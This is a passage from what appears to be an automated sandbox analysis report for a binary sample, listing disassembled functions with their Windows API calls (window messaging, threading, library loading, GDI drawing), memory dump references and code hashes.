                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                  • String ID:
                                                  • API String ID: 1592001646-0
                                                  • Opcode ID: 4e0a791ff27b6ea1abfd237ac6dc795aa43459ebaa94aaa4f38e4cb009ea060b
                                                  • Instruction ID: 21f85cd3750485988359e7fa00fbf69e98105da4d65a7fba4b972cfb79a362ed
                                                  • Opcode Fuzzy Hash: 4e0a791ff27b6ea1abfd237ac6dc795aa43459ebaa94aaa4f38e4cb009ea060b
                                                  • Instruction Fuzzy Hash: DD215531E00909EBDF10DFA4C949BEEBBB9FF84354F084459E541AB241E739AA05DBA4
                                                  Function 00622782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0062280A
                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00622824
                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00622832
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00622840
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$AttributesLayered
                                                  • String ID:
                                                  • API String ID: 2169480361-0
                                                  • Opcode ID: 8b6f0bd759a4f253f9ec7bcb6bfe6be73c2f7b1a39c5f5c6e25fb67c08c8459d
                                                  • Instruction ID: c6d2bda54c1485b58cd4d291efe939f2b4aa31e0d4d937461b9369dee7f0b96e
                                                  • Opcode Fuzzy Hash: 8b6f0bd759a4f253f9ec7bcb6bfe6be73c2f7b1a39c5f5c6e25fb67c08c8459d
                                                  • Instruction Fuzzy Hash: 3E21B631208922BFD7149B24DC55FAA7B96BF85324F148158F4168B6E2C775FC42CB90
                                                  Function 005F78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005F8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,005F790A,?,000000FF,?,005F8754,00000000,?,0000001C,?,?), ref: 005F8D8C
                                                    • Part of subcall function 005F8D7D: lstrcpyW.KERNEL32(00000000,?,?,005F790A,?,000000FF,?,005F8754,00000000,?,0000001C,?,?,00000000), ref: 005F8DB2
                                                    • Part of subcall function 005F8D7D: lstrcmpiW.KERNEL32(00000000,?,005F790A,?,000000FF,?,005F8754,00000000,?,0000001C,?,?), ref: 005F8DE3
                                                  • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,005F8754,00000000,?,0000001C,?,?,00000000), ref: 005F7923
                                                  • lstrcpyW.KERNEL32(00000000,?,?,005F8754,00000000,?,0000001C,?,?,00000000), ref: 005F7949
                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,005F8754,00000000,?,0000001C,?,?,00000000), ref: 005F7984
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: lstrcmpilstrcpylstrlen
                                                  • String ID: cdecl
                                                  • API String ID: 4031866154-3896280584
                                                  • Opcode ID: 4b352d93344493c47e80f160c34f1690e0db707b970638e2632f1ab7deb3d47f
                                                  • Instruction ID: c40a878d5c59e3cf22b956a10e7b1eae3749e72dc3e9e5b09dbce51135807b57
                                                  • Opcode Fuzzy Hash: 4b352d93344493c47e80f160c34f1690e0db707b970638e2632f1ab7deb3d47f
                                                  • Instruction Fuzzy Hash: 82112C3A20070AABDB255F34CC49D7E7BEAFF99350B40402AF942C7364EB759811C791
                                                  Function 00625660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00001060,?,00000004), ref: 006256BB
                                                  • _wcslen.LIBCMT ref: 006256CD
                                                  • _wcslen.LIBCMT ref: 006256D8
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00625816
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend_wcslen
                                                  • String ID:
                                                  • API String ID: 455545452-0
                                                  • Opcode ID: eb3219b95323617841a1e88a01c2901bc0e6513b1d23d060eb4f12c5e0b3737e
                                                  • Instruction ID: f7d98a430537ab105f9578ac62f68d1bae2d3b01ed628787db44f9a0d59430d8
                                                  • Opcode Fuzzy Hash: eb3219b95323617841a1e88a01c2901bc0e6513b1d23d060eb4f12c5e0b3737e
                                                  • Instruction Fuzzy Hash: 83110331A00E2896DF309F61EC85AEE77ADFF51360F10802AF916D6181E770DA81CF60
                                                  Function 005F1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 005F1A47
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005F1A59
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005F1A6F
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005F1A8A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 2932035893fbcbf397877fa0b72b47fb14f7824b0de3caec1a1cfad4d0c1a1b2
                                                  • Instruction ID: a4e8e3f5094edc98476cd4b1124d54af1209c5410ff2387b30642c6489fffe3c
                                                  • Opcode Fuzzy Hash: 2932035893fbcbf397877fa0b72b47fb14f7824b0de3caec1a1cfad4d0c1a1b2
                                                  • Instruction Fuzzy Hash: 1F11393AD01219FFEB10DBA5CD85FADBB79FB08750F200091EA01B7290D6716E50DB98
                                                  Function 005FE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 005FE1FD
                                                  • MessageBoxW.USER32(?,?,?,?), ref: 005FE230
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 005FE246
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 005FE24D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 2880819207-0
                                                  • Opcode ID: beffa70bf1587798639c4dff640ce38a87bc8322bdd818be8534f938b56fe7cf
                                                  • Instruction ID: ac8b2157108129b5305d9fcfa85b17c0c2faf26fac408ae93d325e5619b5e258
                                                  • Opcode Fuzzy Hash: beffa70bf1587798639c4dff640ce38a87bc8322bdd818be8534f938b56fe7cf
                                                  • Instruction Fuzzy Hash: 9E112B76904658BBD7119FA8DC0AAAE7FAEBB46320F144615F915E3390E6B4CD0087A0
                                                  Function 005BD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,?,005BCFF9,00000000,00000004,00000000), ref: 005BD218
                                                  • GetLastError.KERNEL32 ref: 005BD224
                                                  • __dosmaperr.LIBCMT ref: 005BD22B
                                                  • ResumeThread.KERNEL32(00000000), ref: 005BD249
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                  • String ID:
                                                  • API String ID: 173952441-0
                                                  • Opcode ID: fec149c4794ab1f47b6d6417fb0b3d0074e52c4b89bd4b204020dd2763a92fd1
                                                  • Instruction ID: 4b5bb8a212d4671257cd30122390b5f4641561f037ba2b2240b99dbdc1c648b5
                                                  • Opcode Fuzzy Hash: fec149c4794ab1f47b6d6417fb0b3d0074e52c4b89bd4b204020dd2763a92fd1
                                                  • Instruction Fuzzy Hash: 8B01C43A4056057BCB215BA5DC0ABEEBE79FFC1330F100219F925921D0EB71A901C7B0
                                                  Function 0059600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0059604C
                                                  • GetStockObject.GDI32(00000011), ref: 00596060
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0059606A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateMessageObjectSendStockWindow
                                                  • String ID:
                                                  • API String ID: 3970641297-0
                                                  • Opcode ID: d5a50bbc3a54eaa6ae9f85e345f39f40f06fe5f37ea5ad1657b22130f8f52bfb
                                                  • Instruction ID: 48fca3d14962ab425f04fd2d6e36b25a439ddc2e4964708e5c5b964943b6769c
                                                  • Opcode Fuzzy Hash: d5a50bbc3a54eaa6ae9f85e345f39f40f06fe5f37ea5ad1657b22130f8f52bfb
                                                  • Instruction Fuzzy Hash: 2D116D72501909BFEF224FA49C98EEABF6AFF193A4F041216FA1452110D7329C60DBA1
                                                  Function 005B3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 005B3B56
                                                    • Part of subcall function 005B3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 005B3AD2
                                                    • Part of subcall function 005B3AA3: ___AdjustPointer.LIBCMT ref: 005B3AED
                                                  • _UnwindNestedFrames.LIBCMT ref: 005B3B6B
                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 005B3B7C
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 005B3BA4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                  • String ID:
                                                  • API String ID: 737400349-0
                                                  • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                  • Instruction ID: 2f23d474ebab65d64d30da74804694ecf949dde6696eddbcbedd89c89231fcff
                                                  • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                  • Instruction Fuzzy Hash: 9A01E932100149BBDF126E95CC4AEEB7F69FF98754F054014FE4866121D732E961EBA0
                                                  Function 005C3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,005913C6,00000000,00000000,?,005C301A,005913C6,00000000,00000000,00000000,?,005C328B,00000006,FlsSetValue), ref: 005C30A5
                                                  • GetLastError.KERNEL32(?,005C301A,005913C6,00000000,00000000,00000000,?,005C328B,00000006,FlsSetValue,00632290,FlsSetValue,00000000,00000364,?,005C2E46), ref: 005C30B1
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,005C301A,005913C6,00000000,00000000,00000000,?,005C328B,00000006,FlsSetValue,00632290,FlsSetValue,00000000), ref: 005C30BF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 7bfce9cf4d3ecc1923ce227a221c9d1061b9e3f60b62534ea86e0daaaa541db9
                                                  • Instruction ID: 65381fd0f120fa1c347cf518ab11a98cfe0e9bd8170ad2c9cb09fdb8352332ae
                                                  • Opcode Fuzzy Hash: 7bfce9cf4d3ecc1923ce227a221c9d1061b9e3f60b62534ea86e0daaaa541db9
                                                  • Instruction Fuzzy Hash: 8501B537301626AFC7314AA8AC48E677F99BF05771B108628E906F7150D721D90586D0
                                                  Function 005F7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 005F747F
                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 005F7497
                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 005F74AC
                                                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 005F74CA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                  • String ID:
                                                  • API String ID: 1352324309-0
                                                  • Opcode ID: 1de0a920fe381a32726932cb3a8228cb21dc4ffe3d46a91314af9f5f2aeea7bb
                                                  • Instruction ID: a0246b82d66012af498ca36148ce40cf0770de782ac349330ec8156920821fea
                                                  • Opcode Fuzzy Hash: 1de0a920fe381a32726932cb3a8228cb21dc4ffe3d46a91314af9f5f2aeea7bb
                                                  • Instruction Fuzzy Hash: D71179B1205719ABEB209F14EC0DFA67FF8FB08B10F108569A626D7191D7B4E904DBA1
                                                  Function 005FB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB0C4
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB0E9
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB0F3
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB126
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CounterPerformanceQuerySleep
                                                  • String ID:
                                                  • API String ID: 2875609808-0
                                                  • Opcode ID: ba9698f83370d60851b9ee6e35391369987eb2fa954fecc054cf63cb628aee30
                                                  • Instruction ID: 0c1148760bd87494e111936aab206b556ad5a8dce5cae63e6a46e12e2a24b6ac
                                                  • Opcode Fuzzy Hash: ba9698f83370d60851b9ee6e35391369987eb2fa954fecc054cf63cb628aee30
                                                  • Instruction Fuzzy Hash: D6117930C00A2DEBEF10AFA4E969AFEBF78FF09321F004486DA41B2281CB345651CB51
                                                  Function 005F2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 005F2DC5
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 005F2DD6
                                                  • GetCurrentThreadId.KERNEL32 ref: 005F2DDD
                                                  • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 005F2DE4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 2710830443-0
                                                  • Opcode ID: 6a5de6b60e7ec05e2ea6ef1c3f87d71a74bb8b767c87a400161bfd17b50a90a9
                                                  • Instruction ID: 569ed9e500a43f7d8271deda644f0ff55ac45d48f9014991f21869b903a9d7b4
                                                  • Opcode Fuzzy Hash: 6a5de6b60e7ec05e2ea6ef1c3f87d71a74bb8b767c87a400161bfd17b50a90a9
                                                  • Instruction Fuzzy Hash: 5FE06DB1101A287BE7301B629C0EEFB7E6EFB42BB1F401115B205D50809AA88842D6B0
                                                  Function 00628863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005A9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005A9693
                                                    • Part of subcall function 005A9639: SelectObject.GDI32(?,00000000), ref: 005A96A2
                                                    • Part of subcall function 005A9639: BeginPath.GDI32(?), ref: 005A96B9
                                                    • Part of subcall function 005A9639: SelectObject.GDI32(?,00000000), ref: 005A96E2
                                                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00628887
                                                  • LineTo.GDI32(?,?,?), ref: 00628894
                                                  • EndPath.GDI32(?), ref: 006288A4
                                                  • StrokePath.GDI32(?), ref: 006288B2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                  • String ID:
                                                  • API String ID: 1539411459-0
                                                  • Opcode ID: 06be0d764ea063b8037840cd976a4cab5d21286500c4650511411009784376ba
                                                  • Instruction ID: 9095567f17651fb9c7ae3f316e06927b8b2d0c7313caefd6f44e43991c40f25b
                                                  • Opcode Fuzzy Hash: 06be0d764ea063b8037840cd976a4cab5d21286500c4650511411009784376ba
                                                  • Instruction Fuzzy Hash: 50F05435041969FAEB225F94AC0DFCE3F5A6F06320F048100FA11651E1C7B55511CFE5
                                                  Function 005A98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 005A98CC
                                                  • SetTextColor.GDI32(?,?), ref: 005A98D6
